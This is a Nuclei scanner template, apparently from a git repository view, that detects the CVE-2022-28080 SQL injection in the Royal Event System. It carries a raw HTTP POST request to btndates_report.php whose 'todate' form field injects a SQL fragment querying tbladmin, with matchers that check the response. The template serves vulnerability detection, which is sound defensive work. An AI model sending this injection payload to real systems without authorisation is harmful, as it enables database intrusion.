nuclei-templates/cves/2022/CVE-2022-28080.yaml

53 lines
1.7 KiB
YAML
Raw Normal View History

2022-06-15 19:56:31 +00:00
id: CVE-2022-28080
info:
name: Royal Event - SQL Injection
author: lucasljm2001,ekrause
severity: high
description: Detects an SQL Injection vulnerability in Royal Event System
tags: cve,cve2022,sqli
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-28080
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-28080
requests:
- raw:
- |
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: {{Host}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-'select SomeRandomText from tbladmin--
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--
matchers:
- type: word
words:
- "SomeRandomText"
- type: status
status:
- 200